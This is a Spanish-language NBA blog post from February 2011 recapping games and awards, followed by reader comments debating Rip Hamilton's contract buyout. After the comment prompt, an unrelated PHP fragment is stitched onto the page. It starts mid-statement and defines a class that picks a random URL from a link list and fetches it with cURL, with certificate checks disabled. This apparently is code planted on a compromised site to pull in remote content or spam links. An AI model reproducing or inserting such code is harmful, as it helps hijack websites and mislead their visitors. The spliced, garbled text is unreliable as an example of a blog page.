La Crónica (26/02/2011)

27 de February de 2011 por txusma

Rodney Stuckey volvió a la titularidad tras el mini golpe de estado liderando a los Pistons con 28 puntos y un robo crucial en los últimos segundo en la victoria sobre los Utah Jazz (116-120). Con la alegría todo parecía olvidado en Detroit pero Ben Wallace, Tayshaun Prince, Tracy McGrady y RIP Hamilton volvieron a ser baja. El primero por problemas familiares y los otros 3 por diferentes dolencias. Habrá que ver como evolucionan estos problemas porque parece complicado gestionar una plantilla con los veteranos en pie de guerra y con ganas de darte problemas. Por ejemplo, la gente ahora se pregunta porqué Hamilton, en el centro del huracán, no aceptó hacer un buyout de su contrato que le hubiese permitido firmar por los Bulls y tener serias opciones de jugar por ganar otro anillo. En los Jazz, primera titularidad de Harris en un equipo que no tiene mala pinta pero que deberá ajustar sus piezas a tiempo antes de verse eliminado en la carrera por los playoffs.

En el resto de partidos ninguna sorpresa destacable. Los Mavs estuvieron a punto de caer en Washington en un exceso de confianza en el último cuarto donde llegaron a ganar de 9 a falta de 4 minutos. A partir de ahí, reacción de los jovenzuelos de los Wizards con Wall, Young y el recién llegado Crawford en plan jugones, para empatar el partido y ponérselos por corbata a Dirk y compañía. La veteranía de los Mavs les permitió amarrar la victoria (105-99).

Boston celebró la llegada de Krstic y Green con una victoria sobre los Clippers, 99-92, donde todavía no han debutado Williams y Moon.  El serbio, que fue titular, no cuajó una mala actuación y creo que su llegada, aunque debilita el juego interior defensivamente hablando, abre otra vía de ataque en los Celtics al ser muy superior a Kendrick Perkins en este aspecto. Por su parte, el equipo de Griffin volvía a casa después de 12 partidos consecutivos fuera, la segunda mayor serie de partidos fuera de casa de la historia. Sólo han sido capaces de ganar 10.

Victoria justa también de unos Bulls que con la vuelta de Noah y el buen nivel de Deng pueden permitirse el lujo de  que Derrick Rose y Carlos Boozzer descansen un poco. Los Bucks dieron bien poca guerra (83-75).Si por lo que fuera se acabaran haciendose con RIP Hamilton o algún otro escolta de similar nivel habría que meterlos, si es que no lo están ya, en todas las apuestas para conseguir el anillo.

Finalmente, palizas de Memphis sobre Sacramento (92-120), con Zach y Gasol dando lecciones a Cousins y doble-doble de Haddadi incluído, y Houston sobre New Jersey (108-123). Budinger se confirma como alero titular y tiene previsto quedarse un tiempo. En cambio Deron ya debe estar contando los días para abandonar los Nets…

PREMIOS

MVP: Ex-aquo para Kevin Martin (30 puntos, 6 rebotes y 4 asistencias) y Rodney Stuckey (28 puntos, 5 rebotes y 8 asistencias). Destacable también el partido de un renacido Tyson Chandler con 24 puntos, 13 rebotes y rebote ofensivo + canasta crucial en los últimos minutos del encuentro.

Rookie: Al menos parece que hay algo de guerra entre Blake Griffin y John Wall. El primero se fue a los 21 puntos, 11 rebotes y 4 asistencias mientras que el segundo se quedó en 24-5-5. Lástima de las pérdidas y el poco acierto en el tiro.

Sorpresa: Sin Eric Gordon ni Baron Davis, Randy Foye se ha convertido en la referencia exterior de los Clippers y lo está aprovechando bien. Anoche fue el mejor frente los Celtics con 32 puntos y 7 asistencias.

Decepción: Exceptuando a Mbah-a-Moute, los otros 4 integrantes del quinteto de los Bucks anotaron 12 canastas de 45 intentos, menos de un 30% de acierto. Así es normal que no llegaran ni a los 80 puntos.

Esfuerzo en vano: A estos Jazz les va a costar volver a pillar una dinámica ganadora aunque no tienen malas piezas para conseguirlo. Paul Millsap anotó 23 puntos (9 de 12) a los que añadió 11 rebotes y 6 asistencias mientras que Andrei Kirilenko volvió a ser el de los viejos tiempos con 21 puntos, 7 rebotes, 7 asistencias y 2 tapones.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Negociar un buy out de 25 millones de dólares no parece trivial. Desde luego yo apoyo al jugador para que no se baje los pantalones en este caso. Le están tratado terriblemente mal en Detroit.

      Citar

  2. Txusma dice:
    #2

    Si te hacen un buyOut cobras buena parte de lo que te queda de contrato de golpe, verdad? No sé q porcentaje pierdes pero creo que valdría la pena hacerlo si tienes claro que los Bulls te van a fichar. Tus ganas de fastidiar a la franquicia q te está tratando tan mal deben ser grandes pero te estás tirando piedras sobre tu propio tejado.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues depende de la negociación, osea que lo mismo te ofrecen un 75%, que la mitad, que lo que sea… y ten por seguro que los Bulls no le van a pagar 6 millones de dólares…

      Citar

  4. Txusma dice:
    #4

    Pero este año te pueden pagar 2, jugar una final de la NBA, a lo mejor ganarla, ser un jugador d los importantes y al año siguiente seguro q una MidLevel te la llevas. Cuando los 3 grandes renunciaron a parte de su salario para jugar juntos y tener oportunidades d anillo no te pareció mal, verdad?

      Citar

  5. sergio dice:
    #5

    Lo de los Clips suena interesante de cara al año que viene: Mo Williams-Gordon-Griffin-Kaman/DeAndre Jordan me parece un cuarteto digno al que deberian añadir un alero versatil en este Draft.

      Citar

  6. Uno cualquiera dice:
    #6

    El pick de primera ronda de los Clippers de este año ha ido a los Cavs, ¿no?

      Citar

  7. TheDeerHunter dice:
    #7

    A ver, eso de que en Miami renunciaron a algo habría que verlo. Si cuadró es por el tema fiscal en Miami, que por lo visto es significativamente menor que en la media de los estados.
    Después, Hamilton ya ha ganado el anillo. No es lo mismo que otros y tampoco nada le garantiza ganarlo con los bulls. Además estamos hablando que le queda por cobrar lo de este año y dos más. Rondan los 30 millones de dólares y ningún anillo vale eso, más si lo has ganado ya.

      Citar

  8. Denise dice:
    #8

    Pues han ganado los Lakers de tres (87-90) en casa de los Thunder, que empezaron arrasando llegando a ponerse a 14, pero después han sucumbido ante una defensa seria de los Lakers. Bien Artest, que lleva 3 partidos seguidos bastante aceptables, aunque para mi el mejor de Lakers ha sido Odom (aunque no haya hecho numerazos) y haya fallado 2 tiros libres vitales que han pemitido a los Thunder tener después dos triples para haber forzado la prórroga, pero lo han fallado.
    Bryant ha estado un poco lanzapiedras, aunque ha acabado decidiendo con un triple y un tiro de 2 al final.
    No está mal ganar en casa de los Thunder, aunque hay que recordar que éstos se encontraban muy mermados en la zona, ya que ni Perkins ni Mohammed han jugado.
    Eso sí, a los Lakers le hace falta más rotación, suerte para ellos que pronto vuelve Barnes, puesto que en partidos serios, la rotación se está reduciendo a 7 jugadores (como el año pasado).
    Y para acabar de ser un rodillo, le hace falta más tiro exterior, que Fisher, Blake, Brown o Artest las metan más a menudo desde el perimetro aprovechando las ventajas generadas por Kobe y Pau.
    ¿Alguien sabe para cuando vuelve Ratliff?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>